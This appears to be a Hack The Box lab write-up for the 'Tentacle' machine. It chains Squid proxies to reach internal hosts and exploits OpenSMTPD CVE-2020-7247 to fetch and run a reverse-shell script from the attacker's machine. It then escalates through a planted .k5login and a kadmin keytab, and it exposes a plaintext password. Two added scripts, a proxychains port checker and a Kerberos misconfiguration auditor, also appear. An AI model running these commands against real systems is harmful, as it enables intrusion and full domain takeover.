Tentacle


HTB Linux

echo "10.129.50.237 tentacle.htb" | sudo tee -a /etc/hosts

ping -c 1 10.129.50.237

nmap -A -p- -oA tentacle 10.129.50.237 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA tentacle 10.129.50.237

nmap -sU -O -p- -oA tentacle-udp 10.129.50.237

(A full-range UDP scan takes a very long time; --top-ports is the usual compromise.)

If we browse to http://10.129.50.237:3128, the Squid proxy listening there returns a page that mentions two hostnames.

We add both, realcorp.htb and srv01.realcorp.htb, to /etc/hosts.

The box also answers DNS, so we query it directly for the domain's records and try a zone transfer:

dig @10.129.50.237 realcorp.htb

dig @10.129.50.237 realcorp.htb ns

dig @10.129.50.237 realcorp.htb mx

dig @10.129.50.237 realcorp.htb axfr

We add the proxy on the box as the first hop in /etc/proxychains.conf (http 10.129.50.237 3128 under [ProxyList]) and scan the proxy host's own loopback through it, which exposes services bound only to 127.0.0.1:

proxychains nmap -sT -Pn -v -n 127.0.0.1

Only full-connect scans (-sT) go through proxychains, because SYN scans use raw sockets that bypass its LD_PRELOAD connect() hook; -Pn skips the host-discovery ping, which cannot be proxied either, and -n keeps nmap from resolving names outside the chain.

dnsenum --dnserver 10.129.50.237 -f /usr/share/seclists/Discovery/DNS/subdomain-topmillion-110000.txt realcorp.htb

We add the hostnames and addresses dnsenum returns to /etc/hosts.

Then we add the next hop to /etc/proxychains.conf and scan 10.197.243.77 through the chain:

proxychains nmap -sT -Pn -v -n 10.197.243.77

We write a small script that checks a list of ports on a host through proxychains and run it:

./proxychains_portScanner.sh

We update /etc/proxychains.conf with the new hop and run the script again:

./proxychains_portScanner.sh
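The port checker itself appears in the writeup only as a screenshot. The following is an added example of such a script (my own, not the original author's) that probes each port through proxychains. The default port list and the addresses in the comments are assumptions for illustration; run it with the chain already configured in /etc/proxychains.conf.

```bash
#!/usr/bin/env bash
# Added example of a port checker that tunnels each probe through proxychains.
# Not the script from the original writeup; ports and hosts below are assumed.
#
# Usage: ./proxychains_portScanner.sh <host> [port ...]
#   e.g. ./proxychains_portScanner.sh 10.197.243.77 22 25 53 88 3128
# Use IP addresses rather than names unless proxy_dns is enabled in
# /etc/proxychains.conf, otherwise the name lookup leaks outside the chain.

# probe_port HOST PORT: returns 0 when a TCP connect through the chain succeeds.
# Bash opens /dev/tcp with libc connect(), which proxychains hooks via LD_PRELOAD,
# so the connection is made by the last proxy in the chain, not by our host.
# (-q is proxychains-ng's quiet flag; drop it on proxychains 3.x.)
probe_port() {
    local host=$1 port=$2
    timeout 5 proxychains -q bash -c "exec 3<>/dev/tcp/${host}/${port}" >/dev/null 2>&1
}

# scan_ports PROBE HOST PORT...: prints "<port> open" for every port PROBE accepts.
# PROBE is the name of a function taking (host, port); injecting it keeps the loop
# testable without a proxy chain (pass a stub that answers from a fixed list).
scan_ports() {
    local probe=$1 host=$2 port
    shift 2
    for port in "$@"; do
        if "$probe" "$host" "$port"; then
            echo "$port open"
        fi
    done
}

# default_ports: a short list of services worth a first look on an internal host
# (mail, web, SMB, LDAP, Kerberos/kadmin, and another Squid hop on 3128).
default_ports() {
    echo 21 22 25 53 80 88 110 139 143 389 443 445 464 636 749 3128 8080
}

if [ $# -eq 0 ]; then
    echo "usage: $0 <host> [port ...]" >&2
else
    target=$1
    shift
    [ $# -gt 0 ] || set -- $(default_ports)
    scan_ports probe_port "$target" "$@"
fi
```

Each probe is a full TCP connect made by the final proxy, so a filtered port simply times out after five seconds; lower the timeout when sweeping larger ranges, and expect Squid to refuse CONNECT to ports outside its SSL_ports ACL even when the service is up.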

proxychains curl http://wpad.realcorp.htb/wpad.dat | bat -l js

wpad.dat is a proxy auto-configuration (PAC) script: JavaScript that tells browsers which proxy to use for which destination. The address ranges it references are internal networks the proxy can reach, which is where we look next.

We point the script at that range and run it again.

Port 25 is open on 10.241.251.113, so we fingerprint the service through the chain:

proxychains nmap -sT -Pn -p25 -sCV 10.241.251.113

The service is OpenSMTPD, and searchsploit lists a remote code execution exploit for it (EDB-ID 47984, the MAIL FROM command injection, CVE-2020-7247), which we copy locally:

searchsploit opensmtpd

searchsploit -m 47984

The exploit needs a recipient the server accepts mail for, so we put the candidate usernames into a file and check which ones the KDC knows:

cat users

/opt/kerbrute/kerbrute userenum --dc 10.129.50.237 -d realcorp.htb users

As a first test we have the target fetch a URL from our machine:

proxychains python3 47984.py 10.241.251.113 25 'wget 10.10.14.73'

We create a file called cu3rv0x.sh with the reverse shell to run on the target:

cat cu3rv0x.sh

In 47984.py we change <\root> to <\j.nakazawa@realcorp.htb>: the injected command runs during local delivery, so the message has to be addressed to a local user the server accepts.

We can see the server answers with a 200 after the GET, confirming the command ran and reached our web server.

With a listener waiting on port 4444 we run the script on the target:

proxychains python3 47984.py 10.241.251.113 25 'bash /tmp/cu3rv0x.sh'

nc -lvnp 4444

We try SSH as j.nakazawa with the password found on the box:

sshpass -p 'sJB}RM>6z~64_' ssh j.nakazawa@10.129.50.237

SSH here authenticates with Kerberos (GSSAPI), so we describe the realm in /etc/krb5.conf on our machine:

[libdefaults]
    default_realm = REALCORP.HTB

[realms]
    REALCORP.HTB = {
        kdc = 10.129.50.237
    }

kinit contacts the KDC on port 88 and fails with a clock-skew error if our clock is more than five minutes off the KDC's, so sync time with the target first if needed. Then we get a TGT and check it:

kinit j.nakazawa

klist

ssh j.nakazawa@10.129.50.237

Credentials -> j.nakazawa:sJB}RM>6Z~64_

cat user.txt

cat /etc/crontab

cat /usr/local/bin/log_backup.sh

The cron job runs log_backup.sh as admin, and the script copies everything in /var/log/squid into admin's home directory. A .k5login file in a home directory lists the Kerberos principals allowed to log in as that user, so we write one naming our own principal and drop it where the backup will pick it up:

echo "j.nakazawa@REALCORP.HTB" > .k5login

cat .k5login

cp .k5login /var/log/squid

Once the job has run, the ticket we already hold is enough to log in as admin:

ssh admin@srv01.realcorp.htb

klist -k /etc/krb5.keytab

The host keytab is readable by admin and contains a key for kadmin/admin, the principal with full administrative rights over the realm. That key lets us authenticate to kadmin without a password and create any principal we like:

kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB

add_principal root@REALCORP.HTB

We set a password for root@REALCORP.HTB when prompted.

exit

ksu obtains a ticket for root@REALCORP.HTB, the principal a target user maps to by default when it has no .k5login of its own, and since we just set that principal's password we get a root shell:

ksu root
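Both escalations above rest on two Kerberos host settings: a .k5login that lets one principal log in as a different local user, and a host keytab that carries the kadmin/admin key. The following script is an added example (not part of the original writeup) that checks a host for both. The klist output and .k5login contents embedded in it are constructed for the demo, not captured from the target; on a real host the functions are fed `klist -k /etc/krb5.keytab` and the .k5login files under /home.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): checks for the two Kerberos
# misconfigurations abused above. Sample inputs are constructed, not captured.

# keytab_principals KLIST_OUTPUT: prints the unique principals in `klist -k` output
# (data rows are "<kvno> <principal>"; the header and separator lines are skipped).
keytab_principals() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+$/ { print $2 }' | sort -u
}

# keytab_has_admin KLIST_OUTPUT: returns 0 if the keytab holds kadmin/admin, i.e.
# anyone who can read the file can run `kadmin -k -t` and create principals.
keytab_has_admin() {
    keytab_principals "$1" | grep -q '^kadmin/admin@'
}

# k5login_foreign USER K5LOGIN_CONTENT: prints every principal in a .k5login whose
# name is not USER itself. sshd (GSSAPI) and ksu accept any listed principal as
# USER, so a foreign entry such as j.nakazawa@REALCORP.HTB in /home/admin/.k5login
# is a login as admin for whoever holds j.nakazawa's ticket.
k5login_foreign() {
    local user=$1
    printf '%s\n' "$2" | awk -v u="$user" '
        /^[ \t]*(#|$)/ { next }                   # skip comments and blank lines
        { split($1, p, "@"); if (p[1] != u) print $1 }'
}

# audit_host [KEYTAB]: runs both checks against the live system (needs klist).
audit_host() {
    local kt out u f
    kt=${1:-/etc/krb5.keytab}
    if [ -r "$kt" ]; then
        out=$(klist -k "$kt" 2>/dev/null)
        echo "$kt is readable by $(id -un); principals:"
        keytab_principals "$out" | sed 's/^/  /'
        keytab_has_admin "$out" && echo "  !! kadmin/admin key present: full realm admin from this file"
    fi
    for f in /home/*/.k5login /root/.k5login; do
        [ -f "$f" ] || continue
        u=$(basename "$(dirname "$f")")
        k5login_foreign "$u" "$(cat "$f")" | sed "s|^|  !! $f admits |"
    done
    return 0
}

# Constructed sample data (assumed values for the demo, not captured from the target).
SAMPLE_KLIST='Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB'
SAMPLE_K5LOGIN='# who may log in as admin
admin@REALCORP.HTB
j.nakazawa@REALCORP.HTB'

if [ "${1:-}" = "--demo" ]; then
    echo "principals in sample keytab:"; keytab_principals "$SAMPLE_KLIST"
    keytab_has_admin "$SAMPLE_KLIST" && echo "!! sample keytab holds kadmin/admin"
    echo "foreign principals allowed to log in as admin:"; k5login_foreign admin "$SAMPLE_K5LOGIN"
else
    audit_host "$@"
fi
```

Run it with --demo to see the checks on the constructed sample, or without arguments on a host to audit the real keytab and home directories. A host keytab should only ever hold host/ and service keys; kadmin/admin belongs on the KDC alone, and any .k5login entry that is not the account's own principal is an explicit delegation that should be reviewed.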


© 2024 Cu3rv0x